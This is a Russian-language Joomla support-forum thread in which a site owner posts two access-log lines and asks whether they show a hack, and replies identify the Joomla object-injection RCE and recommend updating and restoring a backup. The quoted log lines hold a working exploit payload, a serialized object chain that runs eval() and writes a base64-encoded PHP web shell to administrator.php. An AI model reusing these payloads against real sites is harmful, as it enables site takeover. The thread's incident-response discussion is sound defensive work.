0 Пользователей и 1 Гость просматривают эту тему.
  • 23 Ответов
  • 1640 Просмотров
*

Mc13

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Взломали сайт
« : 22.02.2016, 22:20:05 »
Всем привет! Недавно взломали мой сайт, сначала шел спам, потом сайт умер. В корневой папке было много всякой вкусности. Вроде все починил но стал параноиком) Сегодня нашел две странные строки в лог файле, пугает что на такой запрос сервер дал ответ 200. Не взлом ли это ?


173.255.143.235 - - [22/Feb/2016:20:07:55 +0300] "GET /index.php?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28dirname%28%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%29.%27/administrator.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 53001 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:46:\"eval($_REQUEST[1]);JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
173.255.143.235 - - [22/Feb/2016:20:07:56 +0300] "GET /index.php?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28dirname%28%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%29.%27/administrator.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 53001 "-" "Python-urllib/2.7"
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сайт
« Ответ #1 : 22.02.2016, 22:24:37 »
Взлом конечно, покажите домен, тоже зальюсь))) и вообще какой это чайник так в логах палится?
*

Mc13

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Взломали сайт
« Ответ #2 : 22.02.2016, 22:27:08 »
То есть это удачная попытка взлома?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сайт
« Ответ #3 : 22.02.2016, 22:32:56 »
То есть это удачная попытка взлома?
Это реализация последней нашумевшей баги RCE под Joomla

Т.е произвольное выполнение кода! могу делать что хочу с сайтом!
*

Mc13

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Взломали сайт
« Ответ #4 : 22.02.2016, 22:34:56 »
Что делать? сносить сайт и заливать последний бэкап? ждать обновления?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сайт
« Ответ #5 : 22.02.2016, 22:36:26 »
Обновления уже выпущены, займитесь безопасностью сайта
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Взломали сайт
« Ответ #6 : 22.02.2016, 22:38:40 »
ждать обновления?
какая текущая версия Joomla?
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

Mc13

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Взломали сайт
« Ответ #7 : 22.02.2016, 22:41:20 »
Админку уже скрыл. 3.4.3. вроде как мене в аминке пишет что актуальная версия. и от инекций я тоже плагин ставил( может мне движек поменять? что то с это Joomla все плохо.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сайт
« Ответ #8 : 22.02.2016, 22:43:27 »
С джумло все норм, если следить за актуальностью, как и с любым другим продуктом, баги всегда были есть и будут, не зависимо от версии...
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Взломали сайт
« Ответ #9 : 22.02.2016, 22:45:44 »
что то с это Joomla все плохо.
это не с Joomla плохо. последняя версия - 3.4.8
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

Mc13

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Взломали сайт
« Ответ #10 : 22.02.2016, 22:48:41 »
среди мои знакомых ни кого не ломают, ни на Wordpress, ни на опенкарт. а меня уже второй раз за неделю, кажется это не есть гуд
*

Mc13

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Взломали сайт
« Ответ #11 : 22.02.2016, 22:49:08 »
странно а почему она мне обновится не предлагает?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сайт
« Ответ #12 : 22.02.2016, 22:50:58 »
среди мои знакомых ни кого не ломают, ни на Wordpress, ни на опенкарт. а меня уже второй раз за неделю, кажется это не есть гуд
Поверте и WP, и опен карт ломают, в первую очиредь уязвимость, это человеческий фактор халатности и не внимательности, почитайте багтреки....
*

Mc13

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Взломали сайт
« Ответ #13 : 22.02.2016, 23:02:36 »
Сделал вручную. Но сносить все равно надо? Как вы думаете сайт уже заражен?
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Взломали сайт
« Ответ #14 : 23.02.2016, 00:32:55 »
ломают все, какая разница что ломать? :) банки ломают, а вы говорите opencart... Joomla далеко не самый худший вариант в плане безопасности.
сайт уже заражен.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

Mc13

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Взломали сайт
« Ответ #15 : 23.02.2016, 00:41:33 »
Спасибо за инфу, так бы седел гадал) заливаю последний проверенный бэк ап и ещё раз обновлю в ручном режиме движек. а не подскажите как через htaccess заблокировать доступ всех стран кроме СНГ? Круто что я этот лог заметил. Прям горжусь собой. Правда жалко тратить по 20 минут каждый день на просмотр логов
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Взломали сайт
« Ответ #16 : 23.02.2016, 00:48:28 »
Спасибо за инфу, так бы седел гадал) заливаю последний проверенный бэк ап и ещё раз обновлю в ручном режиме движек. а не подскажите как через htaccess заблокировать доступ всех стран кроме СНГ? Круто что я этот лог заметил. Прям горжусь собой. Правда жалко тратить по 20 минут каждый день на просмотр логов
Задать этот вопрос поисковику не судьба? Вот ответ.

В вашем случае следует регулярно следить за обновлениями и поддерживать движок в актуальном состоянии и не пичкать его левыми расширениями. Так будет меньше шансов его взломать.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

Mc13

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Взломали сайт
« Ответ #17 : 23.02.2016, 00:58:29 »
Спасибо. Тут больше инфы чем я накопал. Взламывают то боты. А расширения у меня все с оф сайтов, что попало не ставлю. Обидно просто что это так быстро все случилось на ровном месте, долбанные боты, главное IP то амерекосовское.
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Взломали сайт
« Ответ #18 : 23.02.2016, 01:04:29 »
долбанные боты, главное IP то амерекосовское.
Не факт. Есть такая полезная вещь, как прокси... А еще - уже взломанные сайты. Так что установка блокирования забугорных IP лишь немного затруднит работу программы. Но не заблокирует. dmitry_stas и winstrool вам выше все детально разжевали.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

Mc13

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Взломали сайт
« Ответ #19 : 23.02.2016, 01:12:24 »
Буду думать о защите и чаще обновлятся. думал папки переименовать но это тоже влечет неприятные моменты. меня эти взломы сделали параноиком))) незнаю что ещё придумать. админку скрыл, JHackGuard поставил, админинтулс бесплатный. В общем буду думать. затем не буду вам парить мозги. спасибо за помощь!)))
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Взломали сайт
« Ответ #20 : 23.02.2016, 09:32:27 »
меня эти взломы сделали параноиком))) незнаю что ещё придумать.
Для того, что бы понять, как защитить сайт, надо знать хотя бы основные техники взлома. Как вы собираетесь ездить на танке, не зная, как им управлять? Я не говорю уже о том, что нужно крутить башню, наводить орудие, производить выстрелы и, главное, что бы тебя не подбили, иметь хоть малейшее представление о тактике боя?

Ссылка первая - сканер. Не панацея, но облегчает жизнь.
Ссылка вторая - море информации для новичка - основы, которые нужно знать!
Ссылка третья - практика взлома Joomla, начиная с первых версий.

Вот после ознакомления со всеми материалами можно будет сказать, что вы имеете представление о том, как ломают сайты, и сможете мыслить в правильном направлении. Это как получение теоретических знаний по вождению. А пока, по аналогии с танком, вы сидите, дергаете все рычаги и тыкаете на кнопки, а он, зараза, не заводится.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

Mc13

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Взломали сайт
« Ответ #21 : 23.02.2016, 10:30:33 »
Спасибо за совет. сканером этим я активно пользуюсь, очень много ложных сигналов. со всем остальным ознакомлюсь.
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Взломали сайт
« Ответ #22 : 23.02.2016, 10:36:15 »
в данном случае лучше много ложных, чем один реальный :)
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Взломали сайт
« Ответ #23 : 23.02.2016, 19:17:16 »
Почитайте Раздел безопасности форума в нем много информации полезной есть
Тема раз
Тема два
Тема три
и др. темы несут в себе море информации.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 4
Просмотров: 165
Последний ответ 26.03.2024, 18:51:10
от wishlight
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 1639
Последний ответ 05.11.2021, 21:47:31
от wishlight
Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

Ответов: 0
Просмотров: 630
Последний ответ 29.08.2020, 00:25:24
от cntrl
Безопасный вход на сайт Joomla и админка

Автор jm

Ответов: 9
Просмотров: 1427
Последний ответ 19.07.2020, 23:57:17
от wishlight
[Руководство] Как защитить сайт на версии 1.5 (не поддерживается разработчиками)

Автор flyingspook

Ответов: 13
Просмотров: 5826
Последний ответ 08.01.2020, 12:52:55
от winstrool